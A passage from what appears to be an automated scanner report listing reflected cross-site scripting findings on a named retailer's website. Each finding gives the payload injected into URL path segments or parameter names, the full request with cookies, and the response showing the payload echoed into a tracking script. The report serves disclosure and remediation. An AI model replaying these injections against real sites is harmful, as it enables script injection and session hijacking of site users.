User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=itp8cta29gippdg6e6uvtl3bp4; expires=Tue, 09-Nov-2010 17:14:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womena4b2d"-alert(1)-"4d7360fd3ec/collaboration/");
//]]>
...[SNIP]...

1.160. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f83df"-alert(1)-"13320d1bbae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/collaborationf83df"-alert(1)-"13320d1bbae/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j3khbiefp69vcvsjqi8s941rl2; expires=Tue, 09-Nov-2010 17:15:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/collaborationf83df"-alert(1)-"13320d1bbae/");
//]]>
...[SNIP]...

1.161. http://www.fredperry.com/limited-edition/women/collaboration/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6261"-alert(1)-"b4c4364b0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/collaboration/?e6261"-alert(1)-"b4c4364b0e=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=irnsq15v08g7ekuep3cnvd35d0; expires=Tue, 09-Nov-2010 17:13:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/collaboration/?e6261"-alert(1)-"b4c4364b0e=1");
//]]>
...[SNIP]...

1.162. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73620"-alert(1)-"1ba7f11b9ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition73620"-alert(1)-"1ba7f11b9ac/women/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=e8intv2rp1hb9gkg85kl8uqgk0; expires=Tue, 09-Nov-2010 17:20:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition73620"-alert(1)-"1ba7f11b9ac/women/dresses/");
//]]>
...[SNIP]...

1.163. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83d54"-alert(1)-"bb802bcf9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women83d54"-alert(1)-"bb802bcf9bd/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4a96726nvsami438drr4261mh2; expires=Tue, 09-Nov-2010 17:20:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women83d54"-alert(1)-"bb802bcf9bd/dresses/");
//]]>
...[SNIP]...

1.164. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5799"-alert(1)-"22e462446fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/dressesa5799"-alert(1)-"22e462446fd/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rj7h8t5kopnlu85l3vbk8n3pk5; expires=Tue, 09-Nov-2010 17:20:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/dressesa5799"-alert(1)-"22e462446fd/");
//]]>
...[SNIP]...

1.165. http://www.fredperry.com/limited-edition/women/dresses/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8e44"-alert(1)-"7e71feb7166 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/dresses/?d8e44"-alert(1)-"7e71feb7166=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=fn2asjnfshrcqtg8d3famvtbs0; expires=Tue, 09-Nov-2010 17:18:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/dresses/?d8e44"-alert(1)-"7e71feb7166=1");
//]]>
...[SNIP]...

1.166. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75686"-alert(1)-"b840be228ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition75686"-alert(1)-"b840be228ba/women/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=16bb9ig1cuv3q2ccnvs9bm93m3; expires=Tue, 09-Nov-2010 17:20:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition75686"-alert(1)-"b840be228ba/women/footwear/");
//]]>
...[SNIP]...

1.167. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c221"-alert(1)-"9b1cf35f8d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women3c221"-alert(1)-"9b1cf35f8d5/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s1avt2mbji989ud1j2vrglcht3; expires=Tue, 09-Nov-2010 17:21:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women3c221"-alert(1)-"9b1cf35f8d5/footwear/");
//]]>
...[SNIP]...

1.168. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd092"-alert(1)-"6094c8a7c78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/footweardd092"-alert(1)-"6094c8a7c78/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b6lhr50bikil4piqe70n3448r3; expires=Tue, 09-Nov-2010 17:21:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/footweardd092"-alert(1)-"6094c8a7c78/");
//]]>
...[SNIP]...

1.169. http://www.fredperry.com/limited-edition/women/footwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8f77"-alert(1)-"856a7d4a239 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/footwear/?a8f77"-alert(1)-"856a7d4a239=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=c7hjustpjqjnfs7q23teruvc77; expires=Tue, 09-Nov-2010 17:19:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/footwear/?a8f77"-alert(1)-"856a7d4a239=1");
//]]>
...[SNIP]...

1.170. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d714e"-alert(1)-"dad4174515e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editiond714e"-alert(1)-"dad4174515e/women/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i1pbkcdgphrua32fu64cjtdjc7; expires=Tue, 09-Nov-2010 17:21:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editiond714e"-alert(1)-"dad4174515e/women/jackets/");
//]]>
...[SNIP]...

1.171. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9b08"-alert(1)-"a3170872b3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womenf9b08"-alert(1)-"a3170872b3d/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7b7avsnog7a4k03461pv6n16t4; expires=Tue, 09-Nov-2010 17:21:27 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womenf9b08"-alert(1)-"a3170872b3d/jackets/");
//]]>
...[SNIP]...

1.172. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a152f"-alert(1)-"3d9d99bfa20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/jacketsa152f"-alert(1)-"3d9d99bfa20/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=6rg1nk1384d1d76b76uptsmhd0; expires=Tue, 09-Nov-2010 17:21:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

